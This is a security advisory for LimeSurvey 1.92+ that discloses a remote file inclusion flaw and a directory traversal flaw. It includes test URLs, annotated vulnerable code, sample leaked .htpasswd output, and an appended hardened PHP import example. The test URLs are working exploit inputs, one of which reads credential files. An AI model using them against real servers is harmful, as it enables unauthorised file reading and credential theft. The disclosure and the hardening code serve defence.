Discovered by: dun \ posdub [at] gmail.com
[LimeSurvey 1.92+ build 120620] Multiple Vulnerabilities
Affected software: "LimeSurvey - the free and open source survey software tool"
Official website: http://www.limesurvey.org/
Download: http://download.limesurvey.org/Latest_stable_release/limesurvey192plus-build120620.zip
# [RFI] (allow_url_include = On; register_globals = On)
Affected versions: 1.92+ build 120620
Test: http://www.bkjia.com/limesurvey/replacements.php?rootdir=http://localhost/phpinfo.txt?
File: ./limesurvey/replacements.php (line 3)
...cut...
<?php
global $rootdir;
include_once($rootdir.'/classes/expressions/LimeExpressionManager.php'); // [RFI]
...cut...
# [Directory traversal] (display_errors = On; register_globals = On)
Affected versions: 1.92+ build 120620 and previous
Test: http://www.bkjia.com/limesurvey/admin/importsurvey.php?copyfunction=1&sExtension=lss&sFullFilepath=.../../secret/.htpasswd
File: ./limesurvey/admin/importsurvey.php (lines 18-38)
...cut...
if ((!isset($importingfrom) && !isset($copyfunction)) || isset($_REQUEST['importingfrom'])) // 1. false if $copyfunction is set
{
    die("Cannot run this script directly");
}
require_once('import_functions.php'); // 2. include functions
if (!isset($copyfunction))
{
    $sFullFilepath = $the_full_file_path;
    $aPathInfo = pathinfo($sFullFilepath);
    $sExtension = $aPathInfo['extension'];
}
$bImportFailed = false;
if (isset($sExtension) && strtolower($sExtension) == 'csv')
{
    $aImportResults = CSVImportSurvey($sFullFilepath);
}
elseif (isset($sExtension) && strtolower($sExtension) == 'lss') // 3. true if $sExtension = 'lss'
{
    $aImportResults = XMLImportSurvey($sFullFilepath, null, (isset($_POST['translinksfields']))); // 4. $sFullFilepath -> our file
...cut...
File: ./limesurvey/admin/import_functions.php (lines 1080-1087)
...cut...
function XMLImportSurvey($sFullFilepath, $sXMLdata = NULL, $sNewSurveyName = NULL, $iDesiredSurveyId = NULL, $bTranslateInsertansTags = true)
{
    global $connect, $dbprefix, $clang, $timeadjust;
    $results['error'] = false;
    if ($sXMLdata == NULL)
    {
        $xml = simplexml_load_file($sFullFilepath); // 5. try to open our file as an XML file
...cut...
This should return a warning containing the first line of our file.
In this case: admin:$apr1$zq2Yh9mB$R9WIiMX4YwOnhDon1kvc5/ from .htpasswd :)
Something like this:
Warning: simplexml_load_file() [function.simplexml-load-file]:
.../secret/.htpasswd:1: parser error : Start tag expected, '<' not found in /www/limesurvey/admin/import_functions.php on line 1087
Warning: simplexml_load_file() [function.simplexml-load-file]:
admin:$apr1$zq2Yh9mB$R9WIiMX4YwOnhDon1kvc5/ in /www/limesurvey/admin/import_functions.php on line 1087
Warning: simplexml_load_file() [function.simplexml-load-file]:
^ in /www/limesurvey/admin/import_functions.php on line 1087
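
A hardened counterpart to the import path above, as an added example (not LimeSurvey's code and not part of the original advisory). The file name arrives as an explicit argument rather than through a global that register_globals can populate, realpath() confines it to one directory, and libxml errors are captured so parser warnings cannot echo file contents. UPLOAD_DIR, load_survey_xml() and the demo files are assumptions made for illustration.

```php
<?php
// Added example: UPLOAD_DIR and load_survey_xml() are hypothetical names.
define('UPLOAD_DIR', sys_get_temp_dir() . '/ls_upload_demo');

function load_survey_xml(string $requested): SimpleXMLElement
{
    $base = realpath(UPLOAD_DIR);
    // realpath() resolves ../ and symlinks and returns false for missing files.
    $path = realpath(UPLOAD_DIR . '/' . $requested);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('import file is outside the upload directory');
    }
    if (strtolower(pathinfo($path, PATHINFO_EXTENSION)) !== 'lss') {
        throw new RuntimeException('unexpected file extension');
    }
    // Collect libxml errors internally instead of emitting PHP warnings,
    // which are what echoed the first line of the file back to the client.
    $previous = libxml_use_internal_errors(true);
    $xml = simplexml_load_file($path, 'SimpleXMLElement', LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    if ($xml === false) {
        throw new RuntimeException('import file is not well-formed XML');
    }
    return $xml;
}

// Constructed demo input: one valid survey file, one non-XML file inside the
// upload directory, and one non-XML file outside it.
@mkdir(UPLOAD_DIR);
file_put_contents(UPLOAD_DIR . '/ok.lss', '<document><LimeSurveyDocType>Survey</LimeSurveyDocType></document>');
file_put_contents(UPLOAD_DIR . '/bad.lss', "admin:constructed-hash\n");
file_put_contents(sys_get_temp_dir() . '/ls_secret_demo.lss', "admin:constructed-hash\n");

foreach (['ok.lss', 'bad.lss', '../ls_secret_demo.lss'] as $name) {
    try {
        echo $name, ' => ', load_survey_xml($name)->getName(), "\n";
    } catch (RuntimeException $e) {
        echo $name, ' => rejected: ', $e->getMessage(), "\n";
    }
}
```

Only ok.lss is parsed; the other two are rejected with a generic message and no line of either file appears in the output, whatever display_errors is set to.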